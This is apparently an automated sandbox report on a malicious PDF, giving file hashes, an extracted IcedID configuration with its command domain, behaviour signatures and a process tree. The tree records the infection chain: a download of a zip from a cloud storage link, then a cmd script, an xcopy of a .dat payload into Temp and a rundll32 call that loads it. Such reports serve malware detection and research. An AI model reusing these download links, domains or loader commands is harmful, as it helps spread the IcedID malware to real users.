Analysis
- max time kernel: 121s
- max time network: 126s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-01-2023 20:34
Behavioral task behavioral1
- Sample: 111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf
- Resource: win7-20221111-en
Behavioral task behavioral2
- Sample: 111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf
- Resource: win10v2004-20220812-en
General
- Target: 111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf
- Size: 150KB
- MD5: 40d02739328a2b96cbbaec90a58137a0
- SHA1: 9fbb76197b155edd7197095c78f49e58d0268de2
- SHA256: 111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6
- SHA512: fc695cfc902dc2ec5585a7c1592d979c88f2dae40562898762511332d175d4372301f6b52d87bdf918dba1732e534b7836ddd8aa5749dc2d06b630ba176f5355
- SSDEEP: 1536:rVTYjPXB7x4IzZwP236NntGB/HcDTIaxeMCcWXz+dqaxA1oPn6b9SBVxqntRZkBz:xkjfVl8Ntu/ATsMaDUysdivS1Ua9OS
Malware Config
Extracted
icedid
3108046779
klayerziluska.com
Signatures
-
Loads dropped DLL 1 IoCs
Processes (pid, process):
5416 rundll32.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes (description, ioc, process):
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes (description, ioc, process):
File opened (read-only) | \??\E: | cmd.exe
-
Drops file in Program Files directory 2 IoCs
Processes (description, ioc, process):
File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\de538387-7ad1-499c-a5f4-b415851e21ab.tmp | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230123213446.pma | setup.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 | msedge.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID | msedge.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service | msedge.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes (description, ioc, process):
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
-
Modifies Internet Explorer settings
Processes (description, ioc, process):
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
-
Modifies registry class 2 IoCs
Processes (description, ioc, process):
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings | msedge.exe
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes (pid, process):
1892 msedge.exe (2 entries)
1592 msedge.exe (2 entries)
1712 msedge.exe (2 entries)
5328 identity_helper.exe (2 entries)
4656 AcroRd32.exe (16 entries)
5416 rundll32.exe (2 entries)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes (pid, process):
1592 msedge.exe (5 entries)
-
Suspicious use of FindShellTrayWindow 12 IoCs
Processes (pid, process):
4656 AcroRd32.exe (1 entry)
1592 msedge.exe (11 entries)
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes (pid, process):
4656 AcroRd32.exe (6 entries)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description, pid, process, target process):
PID 4656 wrote to memory of 1444 | 4656 | AcroRd32.exe | RdrCEF.exe (3 entries)
PID 1444 wrote to memory of 5112 | 1444 | RdrCEF.exe | RdrCEF.exe (repeated)
PID 1444 wrote to memory of 4204 | 1444 | RdrCEF.exe | RdrCEF.exe (repeated)
(64 entries in total: 3 from AcroRd32.exe into pid 1444, the rest from RdrCEF.exe pid 1444 into its child pids 5112 and 4204.)
Processes
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (tree level 1)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf"
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 2)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6B51EC32697E9A3F71B246CC0E0D842C --mojo-platform-channel-handle=1756 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=34099F08FECCEFB0E8A7425627577188 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=34099F08FECCEFB0E8A7425627577188 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FEA8C96D6CE8978D0065B4837DB012D9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FEA8C96D6CE8978D0065B4837DB012D9 --renderer-client-id=4 --mojo-platform-channel-handle=2180 --allow-no-sandbox-job /prefetch:1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=824AB54CD834D8A14D090DC04CE3F9F8 --mojo-platform-channel-handle=2208 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C34EE0A181B34C3F44BF7688506F111B --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (tree level 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CE81DA89795E1CB36A8D5C6E0C28FDFE --mojo-platform-channel-handle=1900 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 2)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://firebasestorage.googleapis.com/v0/b/profound-veld-372422.appspot.com/o/6ncxCfGfXG%2FPaid_Offer_83_Jan_19.zip?alt=media&token=df54093b-4acf-45a1-8c62-d1100bc5a46f
- Adds Run key to start application
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1bcb46f8,0x7ffe1bcb4708,0x7ffe1bcb4718
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4036 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5564 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5320 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (tree level 4)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff77b6a5460,0x7ff77b6a5470,0x7ff77b6a5480
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6560 /prefetch:8
-
C:\Windows\System32\CompPkgSrv.exe (tree level 1)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
-
C:\Windows\System32\rundll32.exe (tree level 1)
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
-
C:\Windows\System32\cmd.exe (tree level 1)
Command line: "C:\Windows\System32\cmd.exe" /c ragpewleaK\lawfinledr.cmd A B C D I F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9
- Enumerates connected drives
-
C:\Windows\system32\xcopy.exe (tree level 2)
Command line: xcopy /s /i /e /h ragpewleaK\overprogramming.dat C:\Users\Admin\AppData\Local\Temp\*
-
C:\Windows\system32\rundll32.exe (tree level 2)
Command line: rundll32 C:\Users\Admin\AppData\Local\Temp\overprogramming.dat,init
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize: 471B
MD5: 74c2edce2571e267077a219dab1c41ed
SHA1: 5cb519ad92a4f7bfbf90385a131a15007731d695
SHA256: f724864a8197b2e3fcd1cae479abbc9677499847e62d101e22d68aeecfaa56fb
SHA512: 8f8a7fc9826dce999e7f816cc57338f5281752ea7bfc9cbd3aafc8c14c97bd95e492dbabec43b037e9fabe0b07d21d4b4c85ea33e5edcb949abc3c69de7e179c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize: 430B
MD5: 5d058912aef0acadd314d24cb4932f77
SHA1: a94658cf89acb669cfd4bd65741b164efc33bc43
SHA256: cb97ab69af8d444b6ae5ff650691e4a7f9d7fce24d36669c4a3b3de8a11e7650
SHA512: 3c7e62d0e62eb4fff1357593e3a3c2c798457f74441114b6d99ebdb876b6de81a04138de455a0fd19b39009918b30e85582a351cd523de965510d0dcf66b6116
-
C:\Users\Admin\AppData\Local\Temp\overprogramming.dat
Filesize: 1002KB
MD5: d0515acd0a80ad5273ad189e72aca86f
SHA1: 494b7f00ee4e2a47c3b6e25f7fc603ea9f3ae1d5
SHA256: 265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844
SHA512: 2da2dc75b9aca01e0133ad119e194ba52b4f929289b8f23c13da9ef2c9e8c00f5a245b177a22207e168dd7039279357abd7bc13757e982f1088643720749d0aa
-
\??\pipe\LOCAL\crashpad_1592_ECGIFFKSKWCFAEKN
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-147-0x0000000000000000-mapping.dmp
-
memory/1140-177-0x0000000000000000-mapping.dmp
-
memory/1444-132-0x0000000000000000-mapping.dmp
-
memory/1592-155-0x0000000000000000-mapping.dmp
-
memory/1676-172-0x0000000000000000-mapping.dmp
-
memory/1712-175-0x0000000000000000-mapping.dmp
-
memory/1860-174-0x0000000000000000-mapping.dmp
-
memory/1892-159-0x0000000000000000-mapping.dmp
-
memory/1976-166-0x0000000000000000-mapping.dmp
-
memory/2136-156-0x0000000000000000-mapping.dmp
-
memory/2160-150-0x0000000000000000-mapping.dmp
-
memory/2536-162-0x0000000000000000-mapping.dmp
-
memory/2860-168-0x0000000000000000-mapping.dmp
-
memory/2980-196-0x0000000000000000-mapping.dmp
-
memory/3660-153-0x0000000000000000-mapping.dmp
-
memory/3948-170-0x0000000000000000-mapping.dmp
-
memory/4108-142-0x0000000000000000-mapping.dmp
-
memory/4204-137-0x0000000000000000-mapping.dmp
-
memory/4360-164-0x0000000000000000-mapping.dmp
-
memory/4452-176-0x0000000000000000-mapping.dmp
-
memory/4548-158-0x0000000000000000-mapping.dmp
-
memory/5112-134-0x0000000000000000-mapping.dmp
-
memory/5288-185-0x0000000000000000-mapping.dmp
-
memory/5328-178-0x0000000000000000-mapping.dmp
-
memory/5416-186-0x0000000000000000-mapping.dmp
-
